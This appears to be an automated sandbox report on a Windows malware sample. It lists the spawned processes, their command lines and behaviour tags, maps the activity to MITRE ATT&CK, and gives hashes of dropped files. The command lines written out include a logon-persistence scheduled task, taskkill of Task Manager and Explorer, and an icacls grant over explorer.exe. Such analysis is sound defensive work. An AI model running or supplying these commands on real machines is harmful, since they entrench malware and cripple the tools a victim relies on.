C:\Program Files\Internet Explorer\iexplore.exe (depth 5)
Command line: "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\spinner.gif
- Modifies Internet Explorer settings
PID:4936 -
C:\Windows\system32\timeout.exe (depth 5)
Command line: timeout /t 15
- Delays execution with timeout.exe
PID:4632 -
C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\scary.exe (depth 5)
Command line: scary.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5604 -
C:\Windows\SYSTEM32\schtasks.exe (depth 6)
Command line: "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
- Creates scheduled task(s)
PID:5368 -
C:\Program Files\SubDir\Romilyaa.exe (depth 6)
Command line: "C:\Program Files\SubDir\Romilyaa.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5700 -
C:\Windows\SYSTEM32\schtasks.exe (depth 7)
Command line: "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
- Creates scheduled task(s)
PID:5888 -
C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\the.exe (depth 5)
Command line: the.exe
- Executes dropped EXE
PID:5360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell.exe -EncodedCommand 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
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5368 -
C:\Windows\system32\taskkill.exe (depth 5)
Command line: taskkill /f /im taskmgr
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5988 -
C:\Windows\system32\taskkill.exe (depth 5)
Command line: taskkill /f /im explorer
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5540 -
C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\ac3.exe (depth 5)
Command line: ac3.exe
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:5900 -
C:\Windows\system32\taskkill.exe (depth 5)
Command line: taskkill /f /im fontdrvhost
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5984 -
C:\Windows\system32\icacls.exe (depth 5)
Command line: icacls c:\Windows\explorer.exe /grant Admin:(F,M)
- Modifies file permissions
PID:4240 -
C:\Windows\system32\timeout.exe (depth 5)
Command line: timeout /t 15
- Delays execution with timeout.exe
PID:3832 -
C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\jaffa.exe (depth 5)
Command line: jaffa.exe
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5652 -
C:\Windows\SysWOW64\ccqytjrniv.exe (depth 6)
Command line: ccqytjrniv.exe
- Modifies visibility of file extensions in Explorer
- Modifies visibility of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Windows security modification
- Enumerates connected drives
- Modifies WinLogon
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:796 -
C:\Windows\SysWOW64\xpxlzrjv.exe (depth 7)
Command line: C:\Windows\system32\xpxlzrjv.exe
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5580 -
C:\Windows\SysWOW64\sphkjhlphydlbbz.exe (depth 6)
Command line: sphkjhlphydlbbz.exe
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1768 -
C:\Windows\SysWOW64\xpxlzrjv.exe (depth 6)
Command line: xpxlzrjv.exe
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2784 -
C:\Windows\SysWOW64\oxurcpmxhhmap.exe (depth 6)
Command line: oxurcpmxhhmap.exe
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3308 -
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (depth 6)
Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5716 -
C:\Windows\system32\timeout.exe (depth 5)
Command line: timeout /t 15
- Delays execution with timeout.exe
PID:5952 -
C:\Users\Admin\AppData\Local\Temp\0693d3b6-dec7-4180-915f-a8d126a4fb67\packer.exe (depth 2)
Command line: "C:\Users\Admin\AppData\Local\Temp\0693d3b6-dec7-4180-915f-a8d126a4fb67\packer.exe" "C:\Users\Admin\AppData\Local\Temp\0693d3b6-dec7-4180-915f-a8d126a4fb67\unpacker.exe" "C:\Users\Admin\AppData\Local\Temp\lol.exe" "loader.exe" "C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5" "" True True False 1 -repack
- Executes dropped EXE
PID:5048 -
C:\Windows\SysWOW64\WerFault.exe (depth 3)
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 1324
- Program crash
PID:5952
-
C:\Windows\System32\CompPkgSrv.exe (depth 1)
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID:4896
-
C:\Windows\System32\CompPkgSrv.exe (depth 1)
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID:1944
-
C:\Windows\system32\AUDIODG.EXE (depth 1)
Command line: C:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004C0
- Suspicious use of AdjustPrivilegeToken
PID:5444
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5048 -ip 5048
PID:1460
-
C:\Windows\System32\rundll32.exe (depth 1)
Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
PID:5668
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
PID:1812
-
C:\Windows\system32\msinfo32.exe (depth 1)
Command line: "C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\Desktop\UninstallSubmit.nfo"
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:5976
-
C:\Program Files\VideoLAN\VLC\vlc.exe (depth 1)
Command line: "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\UnblockGroup.mpeg"
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:480
-
C:\Windows\system32\NOTEPAD.EXE (depth 1)
Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\UninstallSave.ps1xml
- Opens file in notepad (likely ransom note)
PID:4572
-
C:\Windows\system32\msiexec.exe (depth 1)
Command line: C:\Windows\system32\msiexec.exe /V
- Sets file execution options in registry
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
PID:1356 -
C:\Windows\syswow64\MsiExec.exe (depth 2)
Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 4D5912AEF0BEE17C068738112C8D0D1A
- Loads dropped DLL
PID:4944 -
C:\Windows\syswow64\MsiExec.exe (depth 2)
Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 0CACDFA1BFDCE3A6516A53C0B23256D9 E Global\MSI0000
- Sets file execution options in registry
- Loads dropped DLL
- Registers COM server for autorun
- Modifies Internet Explorer settings
- Modifies registry class
PID:5348 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe (depth 2)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe" 19.010.20069 19.010.20069.0
- Executes dropped EXE
- Drops file in Program Files directory
PID:2164
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe (depth 1)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2320 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 2)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
- Executes dropped EXE
- Loads dropped DLL
PID:5436 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 3)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=088B5DD25CEE1E08E16024352AA2F9E5 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
- Executes dropped EXE
- Loads dropped DLL
PID:3068 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe (depth 3)
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=B0539E22F58741F83D1C4F15DE677D39 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=B0539E22F58741F83D1C4F15DE677D39 --renderer-client-id=2 --mojo-platform-channel-handle=1788 --allow-no-sandbox-job /prefetch:1
- Executes dropped EXE
- Loads dropped DLL
PID:5964 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A546A07051CFAC09C5B438F22FEBCB95 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3912 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=562B0D18C7314A0D42AF290401B868AB --mojo-platform-channel-handle=1948 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- Executes dropped EXE
PID:744 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=353678BF651C2637CC05A27AFCFEB577 --mojo-platform-channel-handle=2452 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- Executes dropped EXE
PID:5740
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2504
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:5676
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5840 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.0.501419435\519806322" -parentBuildID 20230214051806 -prefsHandle 1752 -prefMapHandle 1744 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {142513f3-bd6b-4ff1-b61c-7310a9f979e8} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 1832 26766924458 gpu3⤵PID:4140
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.1.1019394367\437426329" -parentBuildID 20230214051806 -prefsHandle 2344 -prefMapHandle 2340 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1ce38bc-76bf-428f-a14e-f667f95d0655} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 2356 26759c88d58 socket3⤵
- Checks processor information in registry
PID:5796 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.2.970634700\618294786" -childID 1 -isForBrowser -prefsHandle 3144 -prefMapHandle 2920 -prefsLen 22252 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5bb76479-fc77-4a6b-aa3a-f885df0cd519} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 2860 26769809558 tab3⤵PID:2420
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.3.997608659\1959745580" -childID 2 -isForBrowser -prefsHandle 3804 -prefMapHandle 3800 -prefsLen 27652 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bc4415f-ac9d-4433-8fa5-3e2a9c074348} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 3816 2676bef1158 tab3⤵PID:4468
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.4.1248705250\212141891" -childID 3 -isForBrowser -prefsHandle 5300 -prefMapHandle 5240 -prefsLen 27652 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cbc22f22-5a9f-4ada-ac4f-28878ddc9251} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 4612 267681cd358 tab3⤵PID:5800
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.5.54016287\1437624456" -childID 4 -isForBrowser -prefsHandle 4880 -prefMapHandle 4700 -prefsLen 27652 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ead7cd48-d18a-408b-9d2a-e68a870bf625} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 5428 2676cec8c58 tab3⤵PID:3960
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.6.1354947477\743920846" -childID 5 -isForBrowser -prefsHandle 5420 -prefMapHandle 4868 -prefsLen 27652 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c157d164-7903-4de6-8c90-f8eaa8f1e285} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 5592 2676d73e558 tab3⤵PID:5412
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.7.369834930\2807757" -childID 6 -isForBrowser -prefsHandle 5056 -prefMapHandle 2572 -prefsLen 27731 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {28533c7e-bb4c-46f3-8fa6-dce878997c78} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 4988 2676e8f2058 tab3⤵PID:4696
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39be055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2964
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (5)
  - Registry Run Keys / Startup Folder (3)
  - Winlogon Helper DLL (2)
- Pre-OS Boot (1)
  - Bootkit (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (5)
  - Registry Run Keys / Startup Folder (3)
  - Winlogon Helper DLL (2)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- File and Directory Permissions Modification (1)
- Hide Artifacts (2)
  - Hidden Files and Directories (2)
- Impair Defenses (3)
  - Disable or Modify Tools (3)
- Modify Registry (11)
- Pre-OS Boot (1)
  - Bootkit (1)
Downloads
-
Filesize
4KB
MD5fb73acc1924324ca53e815a46765be0b
SHA162c0a21b74e7b72a064e4faf1f8799ed37466a19
SHA2565488954fe5b4d87dee40dd68cc1d940d2395a52dc52d1c77f40cd2342b97efd8
SHA512ea3ba299ca07850af45a29e2f88aece9163c13f4921a1fc05d930c008bc017b698c9fb987120147465a53fe0c0848926f543081716d5f877efa5a34b10822895
-
Filesize
4KB
MD56da7cf42c4bc126f50027c312ef9109a
SHA18b31ab8b7b01074257ec50eb4bc0b89259e63a31
SHA2562ebdf7d755b442de775819b0bcfe7bdd06fda92f6ad36dcfdeaab107f58f23df
SHA5125c9783a8c14c6654db2a9a7818d4376fc3b2aeab9820539d20353018d90f734652ebba8052184b62f0e17f8f094da28c2bdfc73a0c707036fb5f923ed25625d9
-
Filesize
4KB
MD5d9d3c74ac593d5598c3b3bceb2f25b1d
SHA1df14dee30599d5d6d67a34d397b993494e66700e
SHA2562cba290a8c42f664a0e1a8e571e27bc846024fa7da9f7adc773a471ef74046bc
SHA512de70858da11efb89e7db55762827f8c1d4b55aff14faea8ffd8a5f15d32d6956f6ca4a3fdd9ffd75906a818af81ba9c7ef056df7c8cec4076308df94ff3207ac
-
Filesize
4KB
MD53071c94f1209b190ec26913a36f30659
SHA1d76fbfbc4ddd17383b6a716f24d137a8dc7ff610
SHA25689868008f5e5c55e5dd5982c15f105d11b9d3603ab45395dde0ec1c5ce61e683
SHA512bd21f269dd92ab826caa6085bf79f17b6c9b6c4b660d03913295611bae590f277a9a0a0e39fa281737fcd9cfbbb6a5c8f02287d316954badca394e730bad72f4
-
Filesize
3KB
MD5533bc8e9ad951ba6d05c35a829e89156
SHA12709a1e51dcfa820a064ee3f0f34dea9cbc4fdee
SHA2560827a66c31995a144229ca6b9bee27de94fd5bba937d25efde961dfa544d5c91
SHA512d1d31f38686caacbe9453cc92c0bb88c4b085903b7b8eb455241839bec6b5ec4de0a0747cdfbcccb7468bb3bc6ca654e34a748762bb1a71e8e4b90285d397201
-
Filesize
512KB
MD576709579655a15965c5f94437534b122
SHA1d83fa8ee3ae42b74d74f3efb1046ed04b5f6c7cf
SHA256bc45eaebd048232a73f0cdfc6aefd3bdae55e551eadf20155d280d002db2a263
SHA51215b654fe96f3b4e3c6624cf1c0f4d5bc0a24cfdfc79067e7436cb822a8bb4379596c1a48e28c8538042cbee15cb0507735aff6a632d50b2303a64c3db73ecfec
-
Filesize
512KB
MD5795b33917584a5b0577ce6b8fadc0557
SHA18c3f13ad859d50648295cdc5e1c3702d72825afc
SHA256257a8c792812794ab97f380d082829d9a58bd6fa6bfa98e8f1f47bb566b162d8
SHA51255bc47b6a380fa90de84a8d59cf4f0a7d062d51dfb6d8f3ec49de59d74652761ff6eb26b2110289cb974576674d8f1c8b5e9b5eaa1db90cde45d5bb84fc6faf3
-
Filesize
152B
MD5390187670cb1e0eb022f4f7735263e82
SHA1ea1401ccf6bf54e688a0dc9e6946eae7353b26f1
SHA2563e6c56356d6509a3fd4b2403555be55e251f4a962379b29735c1203e57230947
SHA512602f64d74096d4fb7a23b23374603246d42b17cc854835e3b2f4d464997b73f289a3b40eb690e3ee707829d4ff886865e982f72155d96be6bc00166f44878062
-
Filesize
152B
MD58294f1821fd3419c0a42b389d19ecfc6
SHA1cd4982751377c2904a1d3c58e801fa013ea27533
SHA25692a96c9309023c8b9e1396ff41f7d9d3ff8a3687972e76b9ebd70b04e3bf223a
SHA512372d369f7ad1b0e07200d3aa6b2cfce5beafa7a97f63932d4c9b3b01a0e8b7eb39881867f87ded55a9973abea973b2d2c9b6fc4892f81cec644702b9edb1566d
-
Filesize
5KB
MD5b6fa7c069cbbe3bde3cec756b5340244
SHA1131eec5233e9d06be1b7389b96ec3f9bf09c268e
SHA256d45eef7edaf8a09e78e12768df13d15e8dfeff98d96f59224bca95ebd9fffb1a
SHA512ab90f22a5e679b19af306081540f5c4f3bddd16c1265ef91d92fe5173e17bb820edd15ee65187840cd747fac52e996c35217b8eef565721371328c6922137bb1
-
Filesize
5KB
MD5ad1ddc8d262115080af1ed6fb529d9c6
SHA102f864764e1a43d7943d295841d0a2cfcbd54c8c
SHA256540acc089315893d15ad838a75bba485ac486a985bfeaa9f80e93ad65a6c8881
SHA512d32ab9040f32ac6b1a2186c07ae08fd32b4700a35906095ea422d9997a86d69f2377814d999faf1a515915b89fefc280211f1014e1b37829ef34484e26a9d240
-
Filesize
5KB
MD51aa66c7ddd97d592ae3fc2bc5e2be922
SHA1340aea9a36cd6cd27d0c3ce97cd4b605109afe10
SHA256a3c0d0edc327b1bf5b235ad66b64999454db268e3c7e4107cec382a9eb92829e
SHA51251ba4229c9c879d0dee0967ea937705477fe433bc690ed344f58aea7be305e5a915a7e613ab327ba829dc42d2d898c31f59c2d3f3beb3ce610c11eb044afd619
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
11KB
MD5a956aa3647f079eb6d14a6f7a92d1df3
SHA17a0e3693646be2fb56765322e3573c7cb282a101
SHA2567cdf5a497c8c2a909d06c56b8fe81452a98254414e1731fdd248f8f4410e6b93
SHA5120eb48bc09144bcab8b0f4fcac7a13742163d894f9bc3fd2acfc36b9e3edc1dd1a1a5d7fdab3480c6045db5ac096af826e35e88923b95719b5ce191714306afe4
-
Filesize
11KB
MD53c0787f25bc198079c4ec2c96a35a941
SHA159657fbe92e60120b514cd3f2233ba1cecd853fb
SHA256255e95380b62c3b46aeae2468d4ae7a44888ac32e6e576bcb4e57363565f5db5
SHA5126d71cafd73fd7c522353fd470ac11580835530abad2f5c6c1fe7f47bf908b472df6eeebf472c47347a24c9e732cff7b82ed5b86ef9c003e106749c719e7f2482
-
Filesize
11KB
MD5af72faaa18eee7d54e6997c88a4c9f32
SHA1f51d04a8a74fb36683b83400991eda273f05602e
SHA2569d3e6c9d19f4d70e3ce43477d5f3dc20ce2b3602eb985849dcb6a5ea262e54ee
SHA512a4c25c1ee580786924a6a59838ad033fed7e590d5d7f51cd95db8271238213b9b2277508214e232ce270a73e26e2c4b64bb03f58d96c9fbc893bf81f683b2486
-
Filesize
11KB
MD5e1af7f2d1065fa55a1bdedca5576136c
SHA138ffb4e0a1b7356eaa9b4ef5f20c2d458ff501df
